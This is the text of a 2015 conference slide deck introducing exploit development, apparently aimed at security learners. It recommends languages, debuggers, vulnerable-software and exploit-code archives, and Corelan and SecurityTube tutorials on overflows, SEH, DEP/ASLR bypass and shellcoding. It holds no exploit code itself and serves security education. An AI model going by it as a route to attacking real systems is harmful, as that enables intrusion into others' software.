Post on 02-Jul-2015
description
Strategic Security, Inc. © http://www.strategicsec.com/
Exploit Development For Mere Mortals
Part 1: Getting Started
Presented By:
Joe McCray
joe@strategicsec.com
http://www.linkedin.com/in/joemccray
http://twitter.com/j0emccray
Strategic Security, Inc. © http://www.strategicsec.com/
Who Is This Talk For?
Who is this for?
• Security Professionals and hobbyists interested in understanding exploit
development
• Security Professionals and hobbyist interested in the fundamentals of writing
exploits
No Geekenese:
• This is NOT a technical, although there will be some technical info – it‟s more
of a getting started guide than anything else
Strategic Security, Inc. © http://www.strategicsec.com/
Things I‟ll Be Covering Today
• What programming languages you need to know?
• What are the best ways to learn these languages?
• What tools do you need?
• Which tools should you start with first?
• What references you use to get started and more importantly what to avoid?
Strategic Security, Inc. © http://www.strategicsec.com/
What Programming Languages Do I Need To Know/Learn?
• An Interpreted Language (Perl, Python, Ruby)
• C
• Assembly
Strategic Security, Inc. © http://www.strategicsec.com/
What Programming Languages Do I Need To Know/Learn?
• If you are new to programming – start with an interpreted language first
• Perl, Python, Ruby
• Youtube is your friend – the best I‟ve seen is from „thenewboston‟
• Python: https://www.youtube.com/watch?v=4Mf0h3HphEA
• Ruby: https://www.youtube.com/watch?v=WJlfVjGt6Hg
• Perl used the be the exploit and tool development language of choice
• Now it‟s Python and Ruby
Strategic Security, Inc. © http://www.strategicsec.com/
What Programming Languages Do I Need To Know/Learn?
• The C Programming Language
• Greg Perry is an amazing teacher of programming languages
• I highly recommend “Absolute Beginner‟s Guide to C”
• Publisher: Sams; 2nd Edition
• ISBN-10: 0672305100
• ISBN-13: 978-0672305108
Strategic Security, Inc. © http://www.strategicsec.com/
Vivek Ramachandran (SecurityTube.net)
@SecurityTube
The Assembly Programming Language
Assembly For Hackers Video Series:
http://www.securitytube.net/groups?operation=view&groupId=5
http://www.securitytube.net/groups?operation=view&groupId=6
What Programming Languages Do I Need To Know/Learn?
Strategic Security, Inc. © http://www.strategicsec.com/
What Tools Do You Need?
•Virtualization Platform (VMWare, VirtualBox, etc)
• Target VMs (XPSP3, Win7, Ubuntu 10)
• Debuggers
• OllyDBG: http://www.ollydbg.de/
• Immunity: http://immunitysec.com/products-immdbg.shtml
• WinDBG: http://www.windbg.org/
• IDA Pro: http://www.hex-rays.com/products/ida/support/download.shtml
• Vulnerable Software
• http://www.oldapps.com/
• http://www.exploit-db.com/
• Exploit Code
• http://www.exploit-db.com/
• http://packetstormsecurity.org/files/tags/exploit/
Strategic Security, Inc. © http://www.strategicsec.com/
Which Tools Should I Start With First?
• For your first few times dealing with simple exploits I‟d recommend OllyDBG
• After that I think you should move to either Immunity or WinDBG
• I would say that IDA Pro should be left for advanced users
Strategic Security, Inc. © http://www.strategicsec.com/
What References Should I Use To Learn ED And Which Should I Avoid?
• If you are BRAND NEW – start with these tutorials:
• http://resources.infosecinstitute.com/debugging-fundamentals-for-exploit-
development/
• http://resources.infosecinstitute.com/seh-exploit/
• If you have a little experience – start with the Corelan.be tutorials
https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
https://www.corelan.be/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/
https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/
https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/
https://www.corelan.be/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/
https://www.corelan.be/index.php/2009/09/05/exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-
basic-exploit-development/
https://www.corelan.be/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-
aslr/
Strategic Security, Inc. © http://www.strategicsec.com/
What References Should I Use To Learn ED And Which Should I Avoid?
• To break up the monotony I‟d recommend doing some reversing tutorials
• http://tuts4you.com/download.php
• Stay away from the majority of books on Buffer Overflows
• Way too much focus on source code
• Way too much focus classic buffer overflows on old OSs
• Books I would recommend (after you‟ve done the tutorial list earlier) are:
• Art of Exploitation
• Shellcoder‟s Handbook
Strategic Security, Inc. © http://www.strategicsec.com/
What References Should I Use To Learn ED And Which Should I Avoid?
• If you are going to take a class at a security conference:
•Exploit Labs with Saumil Shah
• Corelan Live with Peter Van Eeckhoutte
Strategic Security, Inc. © http://www.strategicsec.com/
Major Resources
Vivek Ramachandran (SecurityTube.net)
@SecurityTube
Assembly For Hackers Video Series:
http://www.securitytube.net/groups?operation=view&groupId=5
http://www.securitytube.net/groups?operation=view&groupId=6
Exploit Development Basics Video Series
http://www.securitytube.net/groups?operation=view&groupId=7
http://www.securitytube.net/groups?operation=view&groupId=4
Strategic Security, Inc. © http://www.strategicsec.com/
Major Resources
Peter Van Eeckhoutte (https://www.corelan.be/)
@corelanc0d3r
Hands-Down Probably The Best Tutorials on the market:https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
https://www.corelan.be/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/
https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/
https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/
https://www.corelan.be/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/
https://www.corelan.be/index.php/2009/09/05/exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-
basic-exploit-development/
https://www.corelan.be/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-
aslr/
https://www.corelan.be/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc/
https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/
https://www.corelan.be/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/
https://www.corelan.be/index.php/2010/06/16/exploit-writing-tutorial-part-10-chaining-dep-with-rop-the-rubikstm-cube/
Strategic Security, Inc. © http://www.strategicsec.com/
Tutorial Lists
Basics:
http://x9090.blogspot.com/2010/03/tutorial-exploit-writting-tutorial-from.html
More All-Encompassing List
https://code.google.com/p/it-sec-catalog/wiki/Exploitation
Strategic Security, Inc. © http://www.strategicsec.com/
Specific Exploit Topics
Basics:
http://x9090.blogspot.com/2010/03/tutorial-exploit-writting-tutorial-from.html
More All-Encompassing List
https://code.google.com/p/it-sec-catalog/wiki/Exploitation
Strategic Security, Inc. © http://www.strategicsec.com/
Contact Me....
Toll Free: 1-866-892-2132
Email: joe@strategicsec.com
Twitter: http://twitter.com/j0emccray
LinkedIn: http://www.linkedin.com/in/joemccray